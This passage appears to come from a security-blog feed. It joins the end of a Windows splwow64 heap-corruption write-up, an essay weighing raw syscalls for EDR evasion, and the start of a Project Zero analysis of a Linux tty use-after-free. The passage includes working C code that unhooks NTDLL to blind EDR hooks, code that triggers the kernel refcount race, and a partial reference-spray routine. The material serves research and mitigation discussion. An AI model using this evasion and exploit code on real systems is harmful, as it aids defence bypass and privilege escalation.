06 00007ffe`1d4c95c4     : 00000000`014d0000 00000000`014d0000 00000000`014d9fc0 00000000`014d0000 : ntdll!RtlpFreeHeap+0x3bbcd s
07 00007ffe`1d4c5d21     : 00000000`00000000 00000000`014d0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
08 00007ffe`1cdf9c9c     : 00000000`030c1490 00000000`014d9fd0 00000000`014d9fd0 00000000`00000000 : ntdll!RtlFreeHeap+0x51
09 00007ff7`28b8805d     : 00000000`030c1490 00000000`014d9fd0 00000000`00000000 00000000`00000000 : msvcrt!free+0x1c
0a 00007ff7`28b88ada     : 00000000`00000000 00000000`00000000 00000000`030c0cd0 00000000`030c0d00 : splwow64!TLPCMgr::ProcessRequest+0x485

This is an interesting primitive because it grants us full control over a heap chunk, both free and busy. But unlike the browser world, full of its class objects and vtables, our message buffer is flat and already assumed to be untrustworthy. This means we can't just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short; once the message has been processed and the response copied back to the shared memory region, the chunk is released.

I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in '19[5], but ends up using a FILE object to gain r/w, which is unavailable here.

While I wasn't able to take this to full code execution, I'm fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don't have the motivation to find new ones (for now ;P).

The code, based on the public PoC, is available on Github[8]. It uses the technique described above to leak the heap cookie and smash a free chunk's flink.

Patch

Microsoft patched this in January, just a few weeks after Project Zero FD'd the bug. They added a variety of things to the function, but the crux of the patch is that it now requires a buffer size, which is then used as a bounds check before performing memcpy's.

GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it's set, GdiPrinterThunk_Unpatched is used; otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn't want to break compatibility with...something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:

int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
  int result;

  if ( gbIsUmpdBufferSizeCheckEnabled )
    result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
  else
    result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
  return result;
}

Along with the buffer size they now also require the return buffer size, and check to ensure it's sufficiently large to hold output (this is supplied by the ProxyMsg in splwow64).

And the specific patch for the 0x6d memcpy:

SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
  SizeHigh = SrcPtr[34];
  DstPtr = *(void **)(MsgBuf + 88);
  dwCopySize = SizeHigh + SrcPtr[35];
  if ( DstPtr + dwCopySize <= _BufEnd        // ensure we don't write past the end of the MsgBuf
    && (unsigned int)dwCopySize >= SizeHigh  // ensure total is at least >= SizeHigh
    && (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
  {
    memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
  }
}

It's a little funny at first and seems like an incomplete patch, but it's because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it's only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here's how they've replaced the source offset conversion/check:

MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
  goto LABEL_380;

MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
  // check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
  if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
    goto LABEL_380;
  
  // transform offset to pointer
  *MCpySrcPtr = MCpySrc + MsgBuf;
}

It seems messier this way, but is probably just compiler optimization. MCpySrc holds the offset of the source struct, which is:

typedef struct SrcPtr {
  DWORD offset;
  WORD SizeHigh;
  WORD SizeLow;
} SrcPtr;

Size is likely split out for additional functionality in other LPC functions, but I didn't bother figuring out why. The destination offset/pointer is resolved in a similar fashion.

Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.

References

[0] https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
[1] https://whereisk0shl.top/post/the_story_of_cve_2021_1648
[2] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648
[3] https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/
[4] https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html
[5] https://github.com/scwuaptx/LazyFragmentationHeap/blob/master/LazyFragmentationHeap_slide.pdf
[6] https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
[7] https://twitter.com/scwuaptx
[8] https://github.com/hatRiot/bugs/tree/master/cve20211648

the fanciful allure and utility of syscalls

12 May 2021 at 21:10

So over the years I've had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I've seen an uptick in projects and blogs championing "raw syscalls" as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique's efficacy has been overstated and its utility stretched thin.

This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it's not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.

Note that when I'm talking about EDRs, I'm speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. Crowdstrike Falcon, Cylance, Cybereason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors' user mode hooking capabilities.

Finally, this discussion's perspective is that of post-exploitation, which is necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that's achieved, all bets of process integrity are off.

syscalling

Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:

NtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);

This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:

00007ffb`1676d4f0 4c8bd1           mov     r10, rcx
00007ffb`1676d4f3 b83f000000       mov     eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503             jne     ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05             syscall 
00007ffb`1676d504 c3               ret     
00007ffb`1676d505 cd2e             int     2Eh
00007ffb`1676d507 c3               ret 

This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.

Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.

With that, I want to detail a few shortcomings with this technique that I've seen in many of the public implementations. Let me once again stress here that I'm not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.

syscall values are not consistent

j00ru maintains the go-to source for both nt and win32k syscall tables, and by blindly searching around in them you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.

There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru's Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk in raising our threat profile with the EDR's ML model.

Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, set up the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking the PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?

The least-bad option of these is baking the codes into your payload and switching at runtime based on the detected system version. In memory this is going to look like an s-box switch, but there are no extraneous reads of in-memory or on-disk modules and no stumbles up or down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.
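
A minimal sketch of that baked-in approach; the build-to-SSN mapping below is illustrative only, and would be regenerated from j00ru’s tables for every build you intend to support:

// Returns the SSN for NtReadVirtualMemory given the OS build number
// (read at runtime from, e.g., the PEB's OSBuildNumber field).
int ssn_NtReadVirtualMemory(unsigned int build) {
    switch (build) {
    case 17763: return 0x3f;  // illustrative values -- verify per build
    case 18362: return 0x3f;
    case 19041: return 0x3f;
    // ... one case per supported build ...
    default:    return -1;    // unknown build: bail rather than guess
    }
}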

syscalls miss useful/critical functionality

In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.

In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more “helpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc.), this might not be much of an issue, but expanding beyond that comes with great caveats.

the spooky functions are probably being called anyway

In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.

But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true, though, because the EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel about the cross process injection. Is that enough to avoid heightened scrutiny? Maybe.

Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc.? None of the syscall evasion is going to work here because, naturally, a majority of those functions don’t need to syscall into the kernel (or do so via other NTDLL functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.
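
For completeness, a minimal sketch of one such generic unhooking strategy: map a clean copy of a hooked DLL as an image section and copy its .text over the loaded (hooked) one. This works best for modules like NTDLL whose .text has essentially no relocations, and note the irony that it invokes several of the very APIs an EDR will be watching:

#include <windows.h>
#include <string.h>

BOOL unhook_module(const char *name, const char *path) {
    // Map a pristine copy of the DLL from disk as an image section.
    HANDLE file = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                              OPEN_EXISTING, 0, NULL);
    if (file == INVALID_HANDLE_VALUE) return FALSE;
    HANDLE map = CreateFileMappingA(file, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    BYTE *clean  = (BYTE *)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
    BYTE *hooked = (BYTE *)GetModuleHandleA(name);

    // Find .text in the loaded module and overwrite it with the clean copy.
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(hooked +
        ((IMAGE_DOS_HEADER *)hooked)->e_lfanew);
    IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt);
    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (memcmp(sec->Name, ".text", 5) != 0) continue;
        DWORD old;
        VirtualProtect(hooked + sec->VirtualAddress, sec->Misc.VirtualSize,
                       PAGE_EXECUTE_READWRITE, &old);
        memcpy(hooked + sec->VirtualAddress, clean + sec->VirtualAddress,
               sec->Misc.VirtualSize);
        VirtualProtect(hooked + sec->VirtualAddress, sec->Misc.VirtualSize,
                       old, &old);
    }
    UnmapViewOfFile(clean);
    CloseHandle(map);
    CloseHandle(file);
    return TRUE;
}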

syscalls are partially effective at escaping UM data sinks

Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.

Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook, the EDR would know:

  1. Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
  2. Process A allocated memory in Process B with X permissions (EtwTi)
  3. Process A wrote data into Process B VAS (EtwTi)
  4. Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)

It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin over time as adoption of the feed grows and the API matures.

A strong argument for syscalls here is that they evade custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the Bayesian model, this might be a great reason to use raw syscalls.

your testing isn’t comprehensive or indicative of the general case

This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deployments of new EDRs there is typically a learning or passive phase that allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.

Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.

This also means that pinpointing the reason why your payload works or doesn’t work is a bit of a dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used NTDLL or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can you definitively point to the syscall evasion as the threat score culprit?

At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristics, and thereby the entire network’s model. Repeated testing taints the analysis chain as the model grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud, where it lands in the hands of both automated and manual tooling and analysis. And if you disable that cloud connectivity during testing, you once again lack an accurate representation of the product’s detection capabilities.

In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a hobbled state (i.e. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight, but we lose a significant chunk of EDR capability. Isolation is difficult.

anyway

These things, when taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique, and I’ve grown weary of the dubious veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.

I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.

for EDR

Do not rely on user mode hooks and, more importantly, do not implicitly trust them. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:

  1. Monitoring your hot patches for modification
  2. Encrypting telemetry
  3. Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
  4. β€œValidating” client processes

The fact is, anything emitted from an unsigned, untrusted user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.

The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.

for red team

Using raw syscalls is but a small component of a greater system: evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.

There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.

Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!), can be quite effective at improving an enterprise’s agent model. And not only one enterprise’s model; consider the fact that these data points are shared amongst all vendor subscribers and used to subsequently improve those agent models as well. Burning a technique is no longer isolated to a technology or a client.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

By: Ryan
19 October 2021 at 16:08

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from the end of last year: I had already written most of this blog post around April, but only recently finished it.)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device is the pseudoterminal, used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal. You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.
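
A minimal sketch of setting up such a pair from unprivileged userspace, using the standard libc wrappers around /dev/ptmx:

#define _XOPEN_SOURCE 600
#include <fcntl.h>
#include <stdlib.h>

// Returns 0 on success, yielding fds for the device side and the terminal side.
int open_pty_pair(int *master, int *slave) {
    *master = open("/dev/ptmx", O_RDWR);      // device side ("pseudoterminal master")
    if (*master < 0) return -1;
    grantpt(*master);                         // fix up ownership of /dev/pts/<number>
    unlockpt(*master);                        // allow the terminal side to be opened
    *slave = open(ptsname(*master), O_RDWR);  // terminal side under /dev/pts/
    return (*slave < 0) ? -1 : 0;
}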

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have shown up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.
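
A minimal sketch of driving this race from userspace (not the exploit's exact code): it assumes the pty pair has been opened as sketched earlier, is the controlling terminal of our session, and that pgrp_a and pgrp_b are two process group IDs within that session:

#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/types.h>

static int fd_master, fd_slave;  // both ends of the pseudoterminal pair
static pid_t pgrp_a, pgrp_b;     // two process groups in our session

static void *race_one_side(void *arg) {
    int use_master = (arg != NULL);
    int fd = use_master ? fd_master : fd_slave;
    pid_t *pgrp = use_master ? &pgrp_a : &pgrp_b;
    for (int i = 0; i < 100000; i++)
        ioctl(fd, TIOCSPGRP, pgrp);  // each side takes its own tty->ctrl_lock
    return NULL;
}

void skew_refcount(void) {
    pthread_t t1, t2;
    pthread_create(&t1, NULL, race_one_side, (void *)1);
    pthread_create(&t2, NULL, race_one_side, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    // From time to time, the colliding calls above skew a struct pid refcount.
}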

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up; a sketch of this step follows the list).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.
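
A minimal sketch of step 2, pinning references to a struct pid by queueing SCM_CREDENTIALS messages. A sender may only pass its own PID without CAP_SYS_ADMIN, so the task that owns the pid does the sending; a real implementation would also fan out across many sockets, since each receive queue holds only a limited number of datagrams:

#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <string.h>
#include <unistd.h>

void spray_pid_refs(int count) {
    int sk[2];
    socketpair(AF_UNIX, SOCK_DGRAM, 0, sk);
    int one = 1;
    setsockopt(sk[1], SOL_SOCKET, SO_PASSCRED, &one, sizeof(one));

    struct ucred creds = { .pid = getpid(), .uid = getuid(), .gid = getgid() };
    char dummy = 'A';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(creds))]; } cbuf;
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = cbuf.buf, .msg_controllen = sizeof(cbuf.buf) };
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type  = SCM_CREDENTIALS;
    cm->cmsg_len   = CMSG_LEN(sizeof(creds));
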